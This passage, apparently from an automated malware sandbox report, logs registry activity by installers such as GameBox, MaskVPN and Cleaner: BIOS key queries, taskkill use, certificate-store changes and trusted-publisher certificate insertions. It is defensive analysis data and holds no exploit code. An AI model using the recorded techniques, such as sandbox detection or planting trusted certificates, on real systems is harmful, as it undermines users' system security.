| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{70EAB05E-5E03-4185-9D30-4DF63400B003} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{FA258E0D-C23E-4891-8531-1B2DAAFC870E} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39f